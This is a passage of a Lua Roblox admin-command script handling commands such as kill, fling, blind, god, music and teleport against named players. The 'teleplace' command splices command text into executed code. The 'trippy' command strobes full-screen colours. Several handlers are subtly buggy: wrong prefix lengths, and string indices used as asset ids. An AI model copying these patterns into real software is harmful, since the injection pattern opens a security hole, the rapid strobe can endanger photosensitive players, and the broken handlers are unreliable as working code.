  1268. p:Destroy()
  1269. end
  1270. end
  1271. v.Character.Parent = plr.Character
  1272. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1273. end
  1274. end))
  1275. end
  1276. end
  1277.  
  1278. if Cmd.Text:lower():sub(1,5) == "kill " then
  1279. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1280. for i, v in pairs(plrz) do
  1281. coroutine.resume(coroutine.create(function()
  1282. if v and v.Character then v.Character:BreakJoints() end
  1283. end))
  1284. end
  1285. end
  1286.  
  1287.  
  1288.  
  1289. if Cmd.Text:lower():sub(1,5) == "trip " then
  1290. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1291. for i, v in pairs(plrz) do
  1292. coroutine.resume(coroutine.create(function()
  1293. if v and v.Character and v.Character:findFirstChild("Torso") then
  1294. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1295. end
  1296. end))
  1297. end
  1298. end
  1299.  
  1300. if Cmd.Text:lower():sub(1,5) == "stun " then
  1301. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1302. for i, v in pairs(plrz) do
  1303. coroutine.resume(coroutine.create(function()
  1304. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1305. v.Character.Humanoid.PlatformStand = true
  1306. end
  1307. end))
  1308. end
  1309. end
  1310.  
  1311. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1312. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1313. for i, v in pairs(plrz) do
  1314. coroutine.resume(coroutine.create(function()
  1315. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1316. v.Character.Humanoid.PlatformStand = false
  1317. end
  1318. end))
  1319. end
  1320. end
  1321.  
  1322. if Cmd.Text:lower():sub(1,5) == "jump " then
  1323. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1324. for i, v in pairs(plrz) do
  1325. coroutine.resume(coroutine.create(function()
  1326. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1327. v.Character.Humanoid.Jump = true
  1328. end
  1329. end))
  1330. end
  1331. end
  1332.  
  1333. if Cmd.Text:lower():sub(1,4) == "sit " then
  1334. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1335. for i, v in pairs(plrz) do
  1336. coroutine.resume(coroutine.create(function()
  1337. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1338. v.Character.Humanoid.Sit = true
  1339. end
  1340. end))
  1341. end
  1342. end
  1343.  
  1344. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1345. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1346. for i, v in pairs(plrz) do
  1347. coroutine.resume(coroutine.create(function()
  1348. if v and v.Character then
  1349. for a, obj in pairs(v.Character:children()) do
  1350. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1351. end
  1352. end
  1353. end))
  1354. end
  1355. end
  1356.  
  1357. if Cmd.Text:lower():sub(1,8) == "visible " then
  1358. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1359. for i, v in pairs(plrz) do
  1360. coroutine.resume(coroutine.create(function()
  1361. if v and v.Character then
  1362. for a, obj in pairs(v.Character:children()) do
  1363. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1364. end
  1365. end
  1366. end))
  1367. end
  1368. end
  1369.  
  1370.  
  1371.  
  1372. if Cmd.Text:lower():sub(1,5) == "fire " then
  1373. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1374. for i, v in pairs(plrz) do
  1375. coroutine.resume(coroutine.create(function()
  1376. if v and v.Character and v.Character:findFirstChild("Torso") then
  1377. local cl = Instance.new("Fire", v.Character.Torso)
  1378. end
  1379. end))
  1380. end
  1381. end
  1382.  
  1383. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1384. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1385. for i, v in pairs(plrz) do
  1386. coroutine.resume(coroutine.create(function()
  1387. if v and v.Character and v.Character:findFirstChild("Torso") then
  1388. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1389. end
  1390. end))
  1391. end
  1392. end
  1393.  
  1394. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1395. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1396. for i, v in pairs(plrz) do
  1397. coroutine.resume(coroutine.create(function()
  1398. if v and v.Character and v.Character:findFirstChild("Torso") then
  1399. local cl = Instance.new("Smoke", v.Character.Torso)
  1400. end
  1401. end))
  1402. end
  1403. end
  1404.  
  1405. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1406. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1407. for i, v in pairs(plrz) do
  1408. coroutine.resume(coroutine.create(function()
  1409. if v and v.Character and v.Character:findFirstChild("Torso") then
  1410. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1411. end
  1412. end))
  1413. end
  1414. end
  1415.  
  1416. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1417. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1418. for i, v in pairs(plrz) do
  1419. coroutine.resume(coroutine.create(function()
  1420. if v and v.Character and v.Character:findFirstChild("Torso") then
  1421. local cl = Instance.new("Sparkles", v.Character.Torso)
  1422. end
  1423. end))
  1424. end
  1425. end
  1426.  
  1427. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1428. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1429. for i, v in pairs(plrz) do
  1430. coroutine.resume(coroutine.create(function()
  1431. if v and v.Character and v.Character:findFirstChild("Torso") then
  1432. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1433. end
  1434. end))
  1435. end
  1436. end
  1437.  
  1438. if Cmd.Text:lower():sub(1,3) == "ff " then
  1439. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1440. for i, v in pairs(plrz) do
  1441. coroutine.resume(coroutine.create(function()
  1442. if v and v.Character then Instance.new("ForceField", v.Character) end
  1443. end))
  1444. end
  1445. end
  1446.  
  1447. if Cmd.Text:lower():sub(1,5) == "unff " then
  1448. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1449. for i, v in pairs(plrz) do
  1450. coroutine.resume(coroutine.create(function()
  1451. if v and v.Character then
  1452. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1453. end
  1454. end))
  1455. end
  1456. end
  1457.  
  1458. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1459. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1460. for i, v in pairs(plrz) do
  1461. coroutine.resume(coroutine.create(function()
  1462. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1463. for a, obj in pairs(v.Character:children()) do
  1464. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1465. end
  1466. end
  1467. end))
  1468. end
  1469. end
  1470.  
  1471. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1472. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1473. for i, v in pairs(plrz) do
  1474. coroutine.resume(coroutine.create(function()
  1475. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1476. for a, obj in pairs(v.Character:children()) do
  1477. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1478. end
  1479. end
  1480. end))
  1481. end
  1482. end
  1483.  
  1484.  
  1485.  
  1486. if Cmd.Text:lower():sub(1,4) == "god " then
  1487. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1488. for i, v in pairs(plrz) do
  1489. coroutine.resume(coroutine.create(function()
  1490. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1491. v.Character.Humanoid.MaxHealth = math.huge
  1492. v.Character.Humanoid.Health = 9e9
  1493. end
  1494. end))
  1495. end
  1496. end
  1497.  
  1498. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1499. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1500. for i, v in pairs(plrz) do
  1501. coroutine.resume(coroutine.create(function()
  1502. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1503. v.Character.Humanoid.MaxHealth = 100
  1504. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1505. end
  1506. end))
  1507. end
  1508. end
  1509.  
  1510. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1511. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1512. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1513. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1514. end
  1515.  
  1516. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1517. game.Lighting.Brightness = Cmd.Text:sub(12)
  1518. end
  1519.  
  1520. if Cmd.Text:lower():sub(1,5) == "time " then
  1521. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1522. end
  1523.  
  1524. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1525. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1526. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1527. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1528. end
  1529.  
  1530. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1531. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1532. end
  1533.  
  1534. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1535. game.Lighting.FogStart = Cmd.Text:sub(10)
  1536. end
  1537.  
  1538.  
  1539.  
  1540. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1541. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1542. for i, v in pairs(plrz) do
  1543. coroutine.resume(coroutine.create(function()
  1544. if v and v.Character and v:findFirstChild("Backpack") then
  1545. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1546. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1547. end
  1548. end))
  1549. end
  1550. end
  1551.  
  1552.  
  1553.  
  1554.  
  1555.  
  1556.  
  1557.  
  1558. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1559. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1560. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1561. for i, v in pairs(plrz) do
  1562. coroutine.resume(coroutine.create(function()
  1563. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1564. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1565. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1566. end
  1567. end))
  1568. end
  1569. end
  1570.  
  1571. if Cmd.Text:lower():sub(1,6) == "speed " then
  1572. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1573. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1574. for i, v in pairs(plrz) do
  1575. coroutine.resume(coroutine.create(function()
  1576. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1577. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1578. end
  1579. end))
  1580. end
  1581. end
  1582.  
  1583.  
  1584. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1585. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1586. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1587. for i, v in pairs(plrz) do
  1588. coroutine.resume(coroutine.create(function()
  1589. if v and v:findFirstChild("PlayerGui") then
  1590. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1591. end
  1592. end))
  1593. end
  1594. end
  1595.  
  1596. if Cmd.Text:lower():sub(1,3) == "tp " then
  1597. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1598. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1599. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1600. for i, v in pairs(plrz) do
  1601. coroutine.resume(coroutine.create(function()
  1602. for i2, v2 in pairs(plrz2) do
  1603. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1604. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1605. end
  1606. end
  1607. end))
  1608. end
  1609. end
  1610.  
  1611. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1612. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1613. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1614. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1615. for i, v in pairs(plrz) do
  1616. coroutine.resume(coroutine.create(function()
  1617. if v and v:findFirstChild("leaderstats") then
  1618. for a, st in pairs(v.leaderstats:children()) do
  1619. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1620. end
  1621. end
  1622. end))
  1623. end
  1624. end
  1625.  
  1626. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1627. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1628. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1629. for i, v in pairs(plrz) do
  1630. coroutine.resume(coroutine.create(function()
  1631. if v and v.Character then
  1632. for i,v in pairs(v.Character:children()) do
  1633. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1634. end
  1635. end
  1636. end))
  1637. end
  1638. end
  1639.  
  1640. if Cmd.Text:lower():sub(1,6) == "pants " then
  1641. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1642. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1643. for i, v in pairs(plrz) do
  1644. coroutine.resume(coroutine.create(function()
  1645. if v and v.Character then
  1646. for i,v in pairs(v.Character:children()) do
  1647. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1648. end
  1649. end
  1650. end))
  1651. end
  1652. end
  1653.  
  1654. if Cmd.Text:lower():sub(1,5) == "gear " then
  1655. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1656. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1657. for i, v in pairs(plrz) do
  1658. if Cmd.Text:lower():sub(6) == "all" then return end
  1659. if Cmd.Text:lower():sub(6) == "others"then return end
  1660. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1661. coroutine.resume(coroutine.create(function()
  1662. if v and v:findFirstChild("Backpack") then
  1663. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1664. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1665. obj:Destroy()
  1666. end
  1667. end))
  1668. end
  1669. end
  1670.  
  1671. if Cmd.Text:lower():sub(1,5) == "face " then
  1672. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1673. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1674. for i, v in pairs(plrz) do
  1675. coroutine.resume(coroutine.create(function()
  1676. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1677. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1678. end
  1679. end))
  1680. end
  1681. end
  1682.  
  1683.  
  1684.  
  1685.  
  1686.  
  1687.  
  1688. if Cmd.Text:lower():sub(1,6) == "music " then
  1689. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1690. local id = Cmd.Text:sub(7)
  1691. local pitch = 1
  1692. if tostring(id):lower():find("caramell") then id = 2303479 end
  1693. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1694. if tostring(id):find("rick") then id = 2027611 end
  1695. if tostring(id):find("halo") then id = 1034065 end
  1696. if tostring(id):find("pokemon") then id = 1372261 end
  1697. if tostring(id):find("cursed") then id = 1372257 end
  1698. if tostring(id):find("extreme") then id = 11420933 end
  1699. if tostring(id):find("awaken") then id = 27697277 end
  1700. if tostring(id):find("alone") then id = 27697392 end
  1701. if tostring(id):find("mario") then id = 1280470 end
  1702. if tostring(id):find("choir") then id = 1372258 end
  1703. if tostring(id):find("chrono") then id = 1280463 end
  1704. if tostring(id):find("dotr") then id = 11420922 end
  1705. if tostring(id):find("entertain") then id = 27697267 end
  1706. if tostring(id):find("fantasy") then id = 1280473 end
  1707. if tostring(id):find("final") then id = 1280414 end
  1708. if tostring(id):find("emblem") then id = 1372259 end
  1709. if tostring(id):find("flight") then id = 27697719 end
  1710. if tostring(id):find("banjo") then id = 27697298 end
  1711. if tostring(id):find("gothic") then id = 27697743 end
  1712. if tostring(id):find("hiphop") then id = 27697735 end
  1713. if tostring(id):find("intro") then id = 27697707 end
  1714. if tostring(id):find("mule") then id = 1077604 end
  1715. if tostring(id):find("film") then id = 27697713 end
  1716. if tostring(id):find("nezz") then id = 8610025 end
  1717. if tostring(id):find("angel") then id = 1372260 end
  1718. if tostring(id):find("resist") then id = 27697234 end
  1719. if tostring(id):find("schala") then id = 5985787 end
  1720. if tostring(id):find("organ") then id = 11231513 end
  1721. if tostring(id):find("tunnel") then id = 9650822 end
  1722. if tostring(id):find("spanish") then id = 5982975 end
  1723. if tostring(id):find("venom") then id = 1372262 end
  1724. if tostring(id):find("wind") then id = 1015394 end
  1725. if tostring(id):find("guitar") then id = 5986151 end
  1726. if tostring(id):find("fox") then id = 130797915 end
  1727. if tostring(id):find("gangnam") then id = 130844430 end
  1728. if tostring(id):find("nyan") then id = 130786686 end
  1729. if tostring(id):find("harlem") then id = 131154740 end
  1730. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1731. end
  1732.  
  1733. if Cmd.Text:lower() == "stopmusic" then
  1734. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1735. end
  1736.  
  1737. if Cmd.Text:lower() == "musiclist" then
  1738. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1739. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1740. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1741. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1742. end
  1743.  
  1744.  
  1745. if Cmd.Text:lower():sub(1,5) == "spin " then
  1746. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1747. for i, v in pairs(plrz) do
  1748. coroutine.resume(coroutine.create(function()
  1749. if v and v.Character and v.Character:findFirstChild("Torso") then
  1750. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1751. local torso = v.Character:findFirstChild("Torso")
  1752. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1753. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1754. until not bg or bg.Parent ~= torso
  1755. end
  1756. end))
  1757. end
  1758. end
  1759.  
  1760. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1761. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1762. for i, v in pairs(plrz) do
  1763. coroutine.resume(coroutine.create(function()
  1764. if v and v.Character and v.Character:findFirstChild("Torso") then
  1765. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1766. end
  1767. end))
  1768. end
  1769. end
  1770.  
  1771.  
  1772.  
  1773. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1774. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1775. for i, v in pairs(plrz) do
  1776. coroutine.resume(coroutine.create(function()
  1777. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1778. end))
  1779. end
  1780. end
  1781.  
  1782. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1783. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1784. for i, v in pairs(plrz) do
  1785. coroutine.resume(coroutine.create(function()
  1786. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1787. end))
  1788. end
  1789. end
  1790.  
  1791. if Cmd.Text:lower():sub(1,6) == "fling " then
  1792. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1793. for i, v in pairs(plrz) do
  1794. coroutine.resume(coroutine.create(function()
  1795. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1796. local xran local zran
  1797. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1798. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1799. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1800. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1801. end
  1802. end))
  1803. end
  1804. end
  1805.  
  1806. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1807. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1808. for i, v in pairs(plrz) do
  1809. coroutine.resume(coroutine.create(function()
  1810. if v and v.Character then
  1811. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1812. end
  1813. end))
  1814. end
  1815. end
  1816.  
  1817. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1818. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1819. for i, v in pairs(plrz) do
  1820. coroutine.resume(coroutine.create(function()
  1821. if v and v.Character then
  1822. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1823. wait(.1) v.Character.Humanoid.PlatformStand = false
  1824. end
  1825. end))
  1826. end
  1827. end
  1828.  
  1829. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1830. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1831. for i, v in pairs(plrz) do
  1832. coroutine.resume(coroutine.create(function()
  1833. if v and v.Character then
  1834. for a, obj in pairs(v.Character:children()) do
  1835. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1836. end
  1837. end
  1838. end))
  1839. end
  1840. end
  1841.  
  1842.  
  1843. if Cmd.Text:lower():sub(1,5) == "char " then
  1844. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1845. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1846. for i, v in pairs(plrz) do
  1847. coroutine.resume(coroutine.create(function()
  1848. if v and v.Character then
  1849. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1850. v:LoadCharacter()
  1851. end
  1852. end))
  1853. end
  1854. end
  1855.  
  1856. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1857. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1858. for i, v in pairs(plrz) do
  1859. coroutine.resume(coroutine.create(function()
  1860. if v and v.Character then
  1861. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1862. v:LoadCharacter()
  1863. end
  1864. end))
  1865. end
  1866. end
  1867.  
  1868.  
  1869.  
  1870. if Cmd.Text:lower():sub(1,7) == "normal " then
  1871. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1872. for i, v in pairs(plrz) do
  1873. coroutine.resume(coroutine.create(function()
  1874. if v and v.Character and v.Character:findFirstChild("Torso") then
  1875. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1876. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1877. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1878. v.Character.Torso.Transparency = 0
  1879. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1880. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1881. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1882. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1883. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1884. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1885. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1886. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1887. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1888. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1889. end end
  1890. end
  1891. end))
  1892. end
  1893. end
  1894.  
  1895. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1896. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1897. for i, v in pairs(plrz) do
  1898. coroutine.resume(coroutine.create(function()
  1899. if v and v:findFirstChild("PlayerGui")then
  1900. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1901. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1902. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1903. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1904. end
  1905. end))
  1906. end
  1907. end
  1908.  
  1909. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1910. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1911. for i, v in pairs(plrz) do
  1912. coroutine.resume(coroutine.create(function()
  1913. if v and v:findFirstChild("PlayerGui") then
  1914. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1915. end
  1916. end))
  1917. end
  1918. end
  1919.  
  1920.  
  1921. if Cmd.Text:lower():sub(1,6) == "blind " then
  1922. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1923. for i, v in pairs(plrz) do
  1924. coroutine.resume(coroutine.create(function()
  1925. if v and v:findFirstChild("PlayerGui") then
  1926. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1927. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1928. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1929. end
  1930. end))
  1931. end
  1932. end
  1933.  
  1934. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1935. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1936. for i, v in pairs(plrz) do
  1937. coroutine.resume(coroutine.create(function()
  1938. if v and v:findFirstChild("PlayerGui") then
